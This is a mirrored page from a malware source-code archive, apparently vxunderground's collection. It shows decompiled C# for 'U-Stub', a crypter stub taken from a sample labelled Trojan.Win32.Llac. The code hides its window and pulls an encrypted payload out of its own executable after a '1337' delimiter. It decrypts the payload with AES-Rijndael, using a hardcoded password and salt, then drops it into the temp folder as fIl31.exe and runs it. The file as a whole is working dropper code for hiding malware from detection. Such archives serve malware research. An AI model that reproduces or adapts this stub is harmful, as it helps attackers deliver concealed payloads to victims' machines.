mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 05:15:28 +00:00
149 lines
4.6 KiB
C#
149 lines
4.6 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: U_Stub.Form1
|
|||
|
// Assembly: U-Stub, Version=0.5.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 1A3D191F-9017-4B28-BB6C-EB744F26B6E8
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.cqas-7b1e23881a8ecad479bf21b176cf0d45377cb7306820490a17e1470826acc586.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using System;
|
|||
|
using System.Collections.Generic;
|
|||
|
using System.ComponentModel;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Drawing;
|
|||
|
using System.IO;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Security.Cryptography;
|
|||
|
using System.Text;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
namespace U_Stub
|
|||
|
{
|
|||
|
[DesignerGenerated]
|
|||
|
public class Form1 : Form
|
|||
|
{
|
|||
|
private static List<WeakReference> ᙅ = new List<WeakReference>();
|
|||
|
private IContainer \u0034AAAA;
|
|||
|
private Label \u0035AAA0;
|
|||
|
private string \u0036AAAA;
|
|||
|
private string \u0037AAA0;
|
|||
|
|
|||
|
[DebuggerNonUserCode]
|
|||
|
static Form1()
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
public Form1()
|
|||
|
{
|
|||
|
this.Load += new EventHandler(this.ᙄ);
|
|||
|
lock (Form1.ᙅ)
|
|||
|
Form1.ᙅ.Add(new WeakReference((object) this));
|
|||
|
this.\u0037AAA0 = Path.GetTempPath();
|
|||
|
this.ᙃ();
|
|||
|
}
|
|||
|
|
|||
|
[DebuggerNonUserCode]
|
|||
|
protected override void Dispose(bool disposing)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
if (!disposing || this.\u0034AAAA == null)
|
|||
|
return;
|
|||
|
this.\u0034AAAA.Dispose();
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
base.Dispose(disposing);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
[DebuggerStepThrough]
|
|||
|
private void ᙃ()
|
|||
|
{
|
|||
|
this.Label1 = new Label();
|
|||
|
this.SuspendLayout();
|
|||
|
this.Label1.AutoSize = true;
|
|||
|
this.Label1.Font = new Font("Microsoft Sans Serif", 36f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);
|
|||
|
this.Label1.ForeColor = Color.Black;
|
|||
|
this.Label1.Location = new Point(12, 9);
|
|||
|
this.Label1.Name = "Label1";
|
|||
|
Label label1 = this.Label1;
|
|||
|
Size size1 = new Size(94, 55);
|
|||
|
Size size2 = size1;
|
|||
|
label1.Size = size2;
|
|||
|
this.Label1.TabIndex = 0;
|
|||
|
this.Label1.Text = "0.5";
|
|||
|
this.AutoScaleDimensions = new SizeF(6f, 13f);
|
|||
|
this.AutoScaleMode = AutoScaleMode.Font;
|
|||
|
size1 = new Size(115, 72);
|
|||
|
this.ClientSize = size1;
|
|||
|
this.Controls.Add((Control) this.Label1);
|
|||
|
this.Name = nameof (Form1);
|
|||
|
this.Text = "S-";
|
|||
|
this.ResumeLayout(false);
|
|||
|
this.PerformLayout();
|
|||
|
}
|
|||
|
|
|||
|
internal virtual Label Label1
|
|||
|
{
|
|||
|
[DebuggerNonUserCode] get => this.\u0035AAA0;
|
|||
|
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this.\u0035AAA0 = value;
|
|||
|
}
|
|||
|
|
|||
|
private void ᙄ(object ᙂ, EventArgs _param2)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
this.Visible = false;
|
|||
|
this.Hide();
|
|||
|
string Delimiter = "1337";
|
|||
|
string password = "hUgo@Underground-Economy.biz";
|
|||
|
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared);
|
|||
|
this.\u0036AAAA = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
FileSystem.FileGet(1, ref this.\u0036AAAA);
|
|||
|
FileSystem.FileClose(1);
|
|||
|
string s = Strings.Split(this.\u0036AAAA, Delimiter)[1];
|
|||
|
RijndaelManaged rijndaelManaged = new RijndaelManaged();
|
|||
|
byte[] salt = new byte[8]
|
|||
|
{
|
|||
|
(byte) 1,
|
|||
|
(byte) 2,
|
|||
|
(byte) 3,
|
|||
|
(byte) 4,
|
|||
|
(byte) 5,
|
|||
|
(byte) 6,
|
|||
|
(byte) 7,
|
|||
|
(byte) 8
|
|||
|
};
|
|||
|
Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(password, salt);
|
|||
|
rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.Key.Length);
|
|||
|
rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.IV.Length);
|
|||
|
MemoryStream memoryStream = new MemoryStream();
|
|||
|
CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged.CreateDecryptor(), CryptoStreamMode.Write);
|
|||
|
try
|
|||
|
{
|
|||
|
byte[] buffer = Convert.FromBase64String(s);
|
|||
|
cryptoStream.Write(buffer, 0, buffer.Length);
|
|||
|
cryptoStream.Close();
|
|||
|
s = Encoding.UTF8.GetString(memoryStream.ToArray());
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
FileSystem.FileOpen(1, this.\u0037AAA0 + "\\fIl31.exe", OpenMode.Binary);
|
|||
|
FileSystem.FilePut(1, s, -1L, false);
|
|||
|
FileSystem.FileClose(1);
|
|||
|
Interaction.Shell(this.\u0037AAA0 + "\\fIl31.exe", AppWinStyle.NormalFocus);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
this.Close();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|